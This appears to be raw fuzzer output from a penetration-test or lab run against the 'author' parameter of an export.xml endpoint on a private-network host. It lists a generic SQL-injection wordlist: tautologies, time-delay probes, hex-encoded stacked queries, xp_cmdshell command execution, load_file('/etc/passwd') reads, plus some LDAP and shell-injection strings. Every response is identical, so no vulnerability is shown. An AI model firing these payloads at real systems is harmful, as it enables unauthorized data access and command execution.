Target: http://10.10.11.170:8080/export.xml?author=FUZZ
Total requests: 267
==================================================================
ID    Response   Lines      Word         Chars          Request    
==================================================================
00007:  C=200      1 L	       4 W	     38 Ch	  "1) or pg_sleep(__TIME__)--"
00001:  C=200      1 L	       4 W	     38 Ch	  ")%20or%20('x'='x"
00017:  C=200      1 L	       4 W	     38 Ch	  "insert"
00020:  C=200      1 L	       4 W	     38 Ch	  "; exec xp_regread"
00015:  C=200      1 L	       4 W	     38 Ch	  "declare @q nvarchar (200) 0x730065006c00650063 ..."
00018:  C=200      1 L	       4 W	     38 Ch	  "1) or sleep(__TIME__)#"
00019:  C=200      1 L	       4 W	     38 Ch	  ") or ('a'='a"
00016:  C=200      1 L	       4 W	     38 Ch	  "or 0=0 #"
00013:  C=200      1 L	       4 W	     38 Ch	  "pg_sleep(__TIME__)--"
00010:  C=200      1 L	       4 W	     38 Ch	  "delete"
00011:  C=200      1 L	       4 W	     38 Ch	  "like"
00004:  C=200      1 L	       4 W	     38 Ch	  "benchmark(10000000,MD5(1))#"
00022:  C=200      1 L	       4 W	     38 Ch	  "@var select @var as var into temp end --"
00024:  C=200      1 L	       4 W	     38 Ch	  "asc"
00005:  C=200      1 L	       4 W	     38 Ch	  "update"
00041:  C=200      1 L	       4 W	     38 Ch	  "or 1=1"
00002:  C=200      1 L	       4 W	     38 Ch	  "%20or%201=1"
00039:  C=200      1 L	       4 W	     38 Ch	  "21 %"
00038:  C=200      1 L	       4 W	     38 Ch	  "0"
00028:  C=200      1 L	       4 W	     38 Ch	  "# from wapiti"
00036:  C=200      1 L	       4 W	     38 Ch	  ")) or benchmark(10000000,MD5(1))#"
00037:  C=200      1 L	       4 W	     38 Ch	  "hi' or 'a'='a"
00034:  C=200      1 L	       4 W	     38 Ch	  "UNION ALL SELECT"
00033:  C=200      1 L	       4 W	     38 Ch	  "or a = a"
00040:  C=200      1 L	       4 W	     38 Ch	  "limit"
00031:  C=200      1 L	       4 W	     38 Ch	  "or 'a'='a"
00035:  C=200      1 L	       4 W	     38 Ch	  ") or sleep(__TIME__)='"
00030:  C=200      1 L	       4 W	     38 Ch	  "1 waitfor delay '0:0:10'--"
00029:  C=200      1 L	       4 W	     38 Ch	  "or 0=0 --"
00023:  C=200      1 L	       4 W	     38 Ch	  "1)) or benchmark(10000000,MD5(1))#"
00048:  C=200      1 L	       4 W	     38 Ch	  "a' waitfor delay '0:0:10'--"
00056:  C=200      1 L	       4 W	     38 Ch	  "--"
00044:  C=200      1 L	       4 W	     38 Ch	  "PRINT"
00058:  C=200      1 L	       4 W	     38 Ch	  "declare @s varchar (200) select @s = 0x73656c6 ..."
00055:  C=200      1 L	       4 W	     38 Ch	  "or 'text' = n'text'"
00057:  C=200      1 L	       4 W	     38 Ch	  "or 1=1 or ''='"
00051:  C=200      1 L	       4 W	     38 Ch	  "1 or sleep(__TIME__)#"
00050:  C=200      1 L	       4 W	     38 Ch	  "or%201=1"
00059:  C=200      1 L	       4 W	     38 Ch	  "exec xp"
00052:  C=200      1 L	       4 W	     38 Ch	  "or 1=1"
00053:  C=200      1 L	       4 W	     38 Ch	  "and 1 in (select var from temp)--"
00054:  C=200      1 L	       4 W	     38 Ch	  "or '7659'='7659"
00047:  C=200      1 L	       4 W	     38 Ch	  "));waitfor delay '0:0:__TIME__'--"
00049:  C=200      1 L	       4 W	     38 Ch	  "1;(load_file(char(47,101,116,99,47,112,97,115, ..."
00046:  C=200      1 L	       4 W	     38 Ch	  "or 3=3"
00045:  C=200      1 L	       4 W	     38 Ch	  "hi') or ('a'='a"
00060:  C=200      1 L	       4 W	     38 Ch	  "; exec master..xp_cmdshell 'ping 172.10.1.255'--"
00066:  C=200      1 L	       4 W	     38 Ch	  "or 'unusual' = 'unusual'"
00079:  C=200      1 L	       4 W	     38 Ch	  ") union select * from information_schema.tables;"
00078:  C=200      1 L	       4 W	     38 Ch	  "or a=a"
00077:  C=200      1 L	       4 W	     38 Ch	  "%2A%28%7C%28objectclass%3D%2A%29%29"
00076:  C=200      1 L	       4 W	     38 Ch	  "or%201=1 --"
00069:  C=200      1 L	       4 W	     38 Ch	  "1) or benchmark(10000000,MD5(1))#"
00068:  C=200      1 L	       4 W	     38 Ch	  "truncate"
00071:  C=200      1 L	       4 W	     38 Ch	  "declare @s varchar(200) select @s = 0x77616974 ..."
00067:  C=200      1 L	       4 W	     38 Ch	  "//"
00065:  C=200      1 L	       4 W	     38 Ch	  "admin' or '"
00073:  C=200      1 L	       4 W	     38 Ch	  "sqlvuln"
00072:  C=200      1 L	       4 W	     38 Ch	  "tz_offset"
00063:  C=200      1 L	       4 W	     38 Ch	  "x' AND email IS NULL; --"
00082:  C=200      1 L	       4 W	     38 Ch	  "26 %"
00064:  C=200      1 L	       4 W	     38 Ch	  "&"
00094:  C=200      1 L	       4 W	     38 Ch	  ",@variable"
00100:  C=200      1 L	       4 W	     38 Ch	  "%20or%20''='"
00086:  C=200      1 L	       4 W	     38 Ch	  "or 1=1--"
00080:  C=200      1 L	       4 W	     38 Ch	  "PRINT @@variable"
00099:  C=200      1 L	       4 W	     38 Ch	  "1 or benchmark(10000000,MD5(1))#"
00061:  C=200      1 L	       4 W	     38 Ch	  "3.10E+17"
00098:  C=200      1 L	       4 W	     38 Ch	  "%20$(sleep%2050)"
00097:  C=200      1 L	       4 W	     38 Ch	  "t'exec master..xp_cmdshell 'nslookup www.googl ..."
00096:  C=200      1 L	       4 W	     38 Ch	  "or (EXISTS)"
00093:  C=200      1 L	       4 W	     38 Ch	  "union all select @@version--"
00092:  C=200      1 L	       4 W	     38 Ch	  "/**/or/**/1/**/=/**/1"
00095:  C=200      1 L	       4 W	     38 Ch	  "(sqlattempt2)"
00091:  C=200      1 L	       4 W	     38 Ch	  "1)) or pg_sleep(__TIME__)--"
00090:  C=200      1 L	       4 W	     38 Ch	  "as"
00089:  C=200      1 L	       4 W	     38 Ch	  "%20'sleep%2050'"
00088:  C=200      1 L	       4 W	     38 Ch	  "0x770061006900740066006F0072002000640065006C00 ..."
00085:  C=200      1 L	       4 W	     38 Ch	  "x' AND members.email IS NULL; --"
00087:  C=200      1 L	       4 W	     38 Ch	  "and 1=( if((load_file(char(110,46,101,120,11 ..."
00081:  C=200      1 L	       4 W	     38 Ch	  "or isNULL(1/0) /*"
00102:  C=200      1 L	       4 W	     38 Ch	  "or pg_sleep(__TIME__)--"
00108:  C=200      1 L	       4 W	     38 Ch	  "0x77616974666F722064656C61792027303A303A313027 ..."
00116:  C=200      1 L	       4 W	     38 Ch	  "declare @s varchar(22) select @s ="
00123:  C=200      1 L	       4 W	     38 Ch	  "or 0=0 #""
00122:  C=200      1 L	       4 W	     38 Ch	  "or 1 --'"
00084:  C=200      1 L	       4 W	     38 Ch	  "(sqlvuln)"
00121:  C=200      1 L	       4 W	     38 Ch	  "or sleep(__TIME__)='"
00118:  C=200      1 L	       4 W	     38 Ch	  "or a=a--"
00112:  C=200      1 L	       4 W	     38 Ch	  "or sleep(__TIME__)#"
00114:  C=200      1 L	       4 W	     38 Ch	  "a' or 1=1--"
00113:  C=200      1 L	       4 W	     38 Ch	  "select * from information_schema.tables--"
00117:  C=200      1 L	       4 W	     38 Ch	  "or 2 between 1 and 3"
00110:  C=200      1 L	       4 W	     38 Ch	  ") or pg_sleep(__TIME__)--"
00119:  C=200      1 L	       4 W	     38 Ch	  "or '1'='1"
00115:  C=200      1 L	       4 W	     38 Ch	  "a' or 'a' = 'a"
00111:  C=200      1 L	       4 W	     38 Ch	  "union select"
00109:  C=200      1 L	       4 W	     38 Ch	  "exec(@s)"
00107:  C=200      1 L	       4 W	     38 Ch	  "union select 1,load_file('/etc/passwd'),1,1,1;"
00106:  C=200      1 L	       4 W	     38 Ch	  "; begin declare @var varchar(8000) set @var=' ..."
00103:  C=200      1 L	       4 W	     38 Ch	  "hi' or 'x'='x';"
00105:  C=200      1 L	       4 W	     38 Ch	  "or 'whatever' in ('whatever')"
00130:  C=200      1 L	       4 W	     38 Ch	  "order by"
00138:  C=200      1 L	       4 W	     38 Ch	  "*/*"
00124:  C=200      1 L	       4 W	     38 Ch	  "having"
00145:  C=200      1 L	       4 W	     38 Ch	  "group by userid having 1=1--"
00144:  C=200      1 L	       4 W	     38 Ch	  "-- &password="
00143:  C=200      1 L	       4 W	     38 Ch	  "a' or 3=3--"
00137:  C=200      1 L	       4 W	     38 Ch	  "x' AND userid IS NULL; --"
00141:  C=200      1 L	       4 W	     38 Ch	  "or benchmark(10000000,MD5(1))#"
00140:  C=200      1 L	       4 W	     38 Ch	  "(select top 1"
00135:  C=200      1 L	       4 W	     38 Ch	  ";waitfor delay '0:0:__TIME__'--"
00134:  C=200      1 L	       4 W	     38 Ch	  "or username like char(37);"
00133:  C=200      1 L	       4 W	     38 Ch	  ") or benchmark(10000000,MD5(1))#"
00132:  C=200      1 L	       4 W	     38 Ch	  "having 1=1--"
00129:  C=200      1 L	       4 W	     38 Ch	  "char%4039%41%2b%40SELECT"
00131:  C=200      1 L	       4 W	     38 Ch	  "bfilename"
00148:  C=200      1 L	       4 W	     38 Ch	  "%20or%20x=x"
00125:  C=200      1 L	       4 W	     38 Ch	  "a'"
00152:  C=200      1 L	       4 W	     38 Ch	  "hi' or 1=1 --"
00146:  C=200      1 L	       4 W	     38 Ch	  "or ''='"
00127:  C=200      1 L	       4 W	     38 Ch	  "declare @s varchar (8000) select @s = 0x73656c ..."
00165:  C=200      1 L	       4 W	     38 Ch	  "%27%20or%201=1"
00162:  C=200      1 L	       4 W	     38 Ch	  ") or (a=a"
00164:  C=200      1 L	       4 W	     38 Ch	  "replace"
00163:  C=200      1 L	       4 W	     38 Ch	  "uni/**/on sel/**/ect"
00158:  C=200      1 L	       4 W	     38 Ch	  "("
00160:  C=200      1 L	       4 W	     38 Ch	  "1 or pg_sleep(__TIME__)--"
00157:  C=200      1 L	       4 W	     38 Ch	  "29 %"
00156:  C=200      1 L	       4 W	     38 Ch	  "exec sp"
00155:  C=200      1 L	       4 W	     38 Ch	  "or 'something' = 'some'+'thing'"
00161:  C=200      1 L	       4 W	     38 Ch	  "0 or 1=1"
00154:  C=200      1 L	       4 W	     38 Ch	  "%20or%20'x'='x"
00147:  C=200      1 L	       4 W	     38 Ch	  "; exec master..xp_cmdshell"
00149:  C=200      1 L	       4 W	     38 Ch	  "select"
00166:  C=200      1 L	       4 W	     38 Ch	  ")) or pg_sleep(__TIME__)--"
00168:  C=200      1 L	       4 W	     38 Ch	  "x' AND 1=(SELECT COUNT(*) FROM tabname); --"
00151:  C=200      1 L	       4 W	     38 Ch	  "0x730065006c0065006300740020004000400076006500 ..."
00172:  C=200      1 L	       4 W	     38 Ch	  "1 or 1=1"
00190:  C=200      1 L	       4 W	     38 Ch	  "to_timestamp_tz"
00185:  C=200      1 L	       4 W	     38 Ch	  "hi or a=a"
00184:  C=200      1 L	       4 W	     38 Ch	  "select name from syscolumns where id = (sele ..."
00183:  C=200      1 L	       4 W	     38 Ch	  "or 0=0 #"
00189:  C=200      1 L	       4 W	     38 Ch	  ");waitfor delay '0:0:__TIME__'--"
00179:  C=200      1 L	       4 W	     38 Ch	  "desc"
00187:  C=200      1 L	       4 W	     38 Ch	  "password:*/=1--"
00188:  C=200      1 L	       4 W	     38 Ch	  "distinct"
00181:  C=200      1 L	       4 W	     38 Ch	  ")"
00177:  C=200      1 L	       4 W	     38 Ch	  "declare @q nvarchar (4000) select @q ="
00178:  C=200      1 L	       4 W	     38 Ch	  "or 0=0 --"
00175:  C=200      1 L	       4 W	     38 Ch	  "/"
00176:  C=200      1 L	       4 W	     38 Ch	  "anything' OR 'x'='x"
00171:  C=200      1 L	       4 W	     38 Ch	  "declare @q nvarchar (200) select @q = 0x770061 ..."
00182:  C=200      1 L	       4 W	     38 Ch	  "1)) or sleep(__TIME__)#"
00173:  C=200      1 L	       4 W	     38 Ch	  "; exec ('sel' + 'ect us' + 'er')"
00167:  C=200      1 L	       4 W	     38 Ch	  "%7C"
00170:  C=200      1 L	       4 W	     38 Ch	  "; or '1'='1'"
00169:  C=200      1 L	       4 W	     38 Ch	  "&apos;%20OR"
00174:  C=200      1 L	       4 W	     38 Ch	  "23 OR 1=1"
00193:  C=200      1 L	       4 W	     38 Ch	  "%2A%28%7C%28mail%3D%2A%29%29"
00213:  C=200      1 L	       4 W	     38 Ch	  "!"
00205:  C=200      1 L	       4 W	     38 Ch	  "or '1'='1'--"
00211:  C=200      1 L	       4 W	     38 Ch	  "?"
00204:  C=200      1 L	       4 W	     38 Ch	  "@variable"
00212:  C=200      1 L	       4 W	     38 Ch	  "or 1/*"
00202:  C=200      1 L	       4 W	     38 Ch	  "28 %"
00207:  C=200      1 L	       4 W	     38 Ch	  "//*"
00201:  C=200      1 L	       4 W	     38 Ch	  "x' or 1=1 or 'x'='y"
00208:  C=200      1 L	       4 W	     38 Ch	  "%2A%7C"
00198:  C=200      1 L	       4 W	     38 Ch	  "or 1 in (select @@version)--"
00196:  C=200      1 L	       4 W	     38 Ch	  ")) or sleep(__TIME__)='"
00192:  C=200      1 L	       4 W	     38 Ch	  "UNION SELECT"
00194:  C=200      1 L	       4 W	     38 Ch	  "+sqlvuln"
00200:  C=200      1 L	       4 W	     38 Ch	  "union select * from users where login = char ..."
00214:  C=200      1 L	       4 W	     38 Ch	  "'"
00228:  C=200      1 L	       4 W	     38 Ch	  "' or 0=0 #"
00220:  C=200      1 L	       4 W	     38 Ch	  "' or 1=1"
00199:  C=200      1 L	       4 W	     38 Ch	  "sqlvuln;"
00195:  C=200      1 L	       4 W	     38 Ch	  "or 1=1 /*"
00236:  C=200      1 L	       4 W	     38 Ch	  "' or a=a--"
00234:  C=200      1 L	       4 W	     38 Ch	  "' or 1=1 or ''='"
00233:  C=200      1 L	       4 W	     38 Ch	  "or 1=1--"
00232:  C=200      1 L	       4 W	     38 Ch	  "' or 1 --'"
00216:  C=200      1 L	       4 W	     38 Ch	  "declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)"
00231:  C=200      1 L	       4 W	     38 Ch	  "' or '1'='1'--"
00230:  C=200      1 L	       4 W	     38 Ch	  "' or 1=1--"
00227:  C=200      1 L	       4 W	     38 Ch	  "' or 0=0 --"
00226:  C=200      1 L	       4 W	     38 Ch	  "')%20or%20('x'='x"
00229:  C=200      1 L	       4 W	     38 Ch	  "or 0=0 #""
00224:  C=200      1 L	       4 W	     38 Ch	  "'%20or%20''='"
00223:  C=200      1 L	       4 W	     38 Ch	  "'; exec master..xp_cmdshell 'ping 172.10.1.255'--"
00222:  C=200      1 L	       4 W	     38 Ch	  "x' OR full_name LIKE '%Bob%"
00215:  C=200      1 L	       4 W	     38 Ch	  "or a = a"
00217:  C=200      1 L	       4 W	     38 Ch	  "declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)"
00218:  C=200      1 L	       4 W	     38 Ch	  "declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)"
00237:  C=200      1 L	       4 W	     38 Ch	  "or a=a"
00219:  C=200      1 L	       4 W	     38 Ch	  "declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)"
00225:  C=200      1 L	       4 W	     38 Ch	  "'%20or%20'x'='x"
00239:  C=200      1 L	       4 W	     38 Ch	  "'hi' or 'x'='x';"
00251:  C=200      1 L	       4 W	     38 Ch	  "--sp_password"
00243:  C=200      1 L	       4 W	     38 Ch	  "' or username like '%"
00257:  C=200      1 L	       4 W	     38 Ch	  "1;SELECT%20*"
00252:  C=200      1 L	       4 W	     38 Ch	  "' UNION SELECT"
00253:  C=200      1 L	       4 W	     38 Ch	  "' UNION ALL SELECT"
00250:  C=200      1 L	       4 W	     38 Ch	  "t'exec master..xp_cmdshell 'nslookup www.google.com'--"
00255:  C=200      1 L	       4 W	     38 Ch	  "' (select top 1"
00254:  C=200      1 L	       4 W	     38 Ch	  "' or (EXISTS)"
00249:  C=200      1 L	       4 W	     38 Ch	  "'; exec xp_regread"
00248:  C=200      1 L	       4 W	     38 Ch	  "'; exec master..xp_cmdshell"
00247:  C=200      1 L	       4 W	     38 Ch	  "' or user like '%"
00246:  C=200      1 L	       4 W	     38 Ch	  "' or uid like '%"
00259:  C=200      1 L	       4 W	     38 Ch	  "'%20or%201=1"
00244:  C=200      1 L	       4 W	     38 Ch	  "' or uname like '%"
00241:  C=200      1 L	       4 W	     38 Ch	  "procedure"
00238:  C=200      1 L	       4 W	     38 Ch	  "') or ('a'='a"
00240:  C=200      1 L	       4 W	     38 Ch	  "or"
00261:  C=200      1 L	       4 W	     38 Ch	  "%28"

Total time: 0
Processed Requests: 257
Filtered Requests: 40
Requests/sec.: 0
